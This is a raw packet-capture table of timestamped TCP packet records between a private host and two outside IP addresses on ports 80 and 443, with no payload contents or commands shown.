Sep 4, 2024 17:37:09.106288910 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.106323957 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.106574059 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.106615067 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.106617928 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.106628895 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.106657982 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.106667995 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.106731892 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.106740952 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.106750011 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.106760979 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.106779099 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.106796980 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.106834888 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.106851101 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.106862068 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.106870890 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.106873989 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.106893063 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.106923103 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.106944084 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.106952906 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.106961966 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.106975079 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.106982946 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.107001066 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.107091904 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.107103109 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.107111931 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.107121944 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.107131958 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.107131958 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.107141972 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.107156992 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.107163906 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.107168913 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.107196093 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.107228041 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.107260942 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.107276917 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.107287884 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.107310057 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.107317924 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.107353926 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.107363939 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.107371092 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.107381105 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.107398987 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.107424021 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.107666969 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.107705116 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.107708931 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.107721090 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.107743979 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.107747078 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.107753992 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.107778072 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.107863903 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.107877016 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.107886076 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.107903957 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.107908964 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.107918024 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.107943058 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.107996941 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.108006954 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.108016014 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.108031034 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.108043909 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.108098984 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.108128071 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.108134985 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.108139992 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.108160973 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.108186960 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.108202934 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.108211994 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.108221054 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.108228922 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.108239889 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.108249903 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.108270884 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.108314991 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.108325958 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.108335972 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.108344078 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.108364105 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.108374119 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.108427048 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.108437061 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.108448982 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.108458996 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.108465910 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.108474970 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.108501911 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.108515978 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.108526945 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.108536005 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.108549118 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.108557940 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.108566046 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.109724045 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.109740019 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.109781981 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.109790087 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.109827995 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.109884024 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.109921932 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.109962940 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.109975100 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110008001 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.110008001 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.110038042 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110048056 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110059977 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110075951 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.110083103 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.110090971 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110100985 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110101938 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.110111952 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110121965 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110127926 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.110131979 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110147953 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.110166073 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.110320091 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110330105 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110338926 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110352039 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110362053 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110363007 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.110373020 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.110375881 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110389948 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110390902 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.110402107 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110410929 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110414982 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.110420942 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110430956 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110434055 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.110440969 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110450029 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110455990 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.110461950 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110465050 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.110477924 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110488892 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.110488892 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110502958 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110507011 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.110527039 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.110547066 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.110764027 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110775948 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110805988 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.110908985 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110920906 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110929012 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110939026 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.110950947 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.110966921 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.110985994 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.111048937 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.111063957 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.111093998 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.111099958 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.111110926 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.111130953 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.111166954 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.111181021 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.111212969 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.111219883 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.111228943 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.111254930 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.112050056 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.112063885 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.112107992 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.112113953 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.112123013 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.112149000 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.112545013 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.112559080 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.112607002 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.112615108 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.112646103 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.113569975 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.113584995 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.113615036 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.113615036 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.113634109 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.113645077 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.113652945 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.113672972 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.113702059 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.113718987 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.113729954 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.113759041 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.136100054 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.136113882 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.136121988 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.136132002 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.136141062 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.136152983 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.136161089 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.136172056 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.136181116 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.136190891 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.136213064 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.136229992 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.136231899 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.136243105 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.136270046 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.136272907 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.136281013 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.136308908 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.136316061 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.136326075 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.136327028 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.136357069 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.136387110 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.136418104 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.137494087 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.137506008 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.137518883 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.137553930 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.137566090 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.137600899 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.137614965 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.137624025 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.137634039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.137638092 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.137644053 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.137654066 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.137679100 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.137736082 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.137747049 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.137754917 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.137764931 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.137773991 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.137774944 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.137784958 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.137809038 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.137836933 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.137873888 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.154426098 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.154437065 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.154447079 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.154479980 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.154506922 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.155106068 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.155117989 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.155127048 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.155138969 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.155152082 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.155179977 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.156981945 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.156991005 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.157000065 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.157031059 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.157032013 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.157043934 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.157043934 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.157057047 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.157066107 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.157071114 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.157080889 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.157095909 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.157519102 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.157566071 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.157613039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.157624006 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.157655954 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.157707930 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.157717943 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.157735109 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.157752037 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.157763004 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.157855034 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.157901049 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.158132076 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.158166885 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.158169985 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.158185959 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.158210993 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.158221960 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.158243895 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.158253908 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.158262014 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.158272028 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.158281088 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.158308983 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.158324003 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.158354998 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.158380985 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.158396006 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.158412933 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.158423901 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.158461094 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.158471107 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.158479929 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.158489943 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.158499002 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.158499956 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.158521891 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.158531904 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.158607006 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.158618927 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.158627033 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.158636093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.158643007 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.158647060 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.158653975 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.158657074 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.158679008 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.158688068 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.158752918 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.158762932 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.158786058 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.158797026 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.158828974 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.158839941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.158849001 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.158874989 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.158886909 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.158912897 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.158922911 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.158931017 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.158941984 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.158948898 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.158972025 CEST	49719	80	192.168.2.6	147.45.44.104
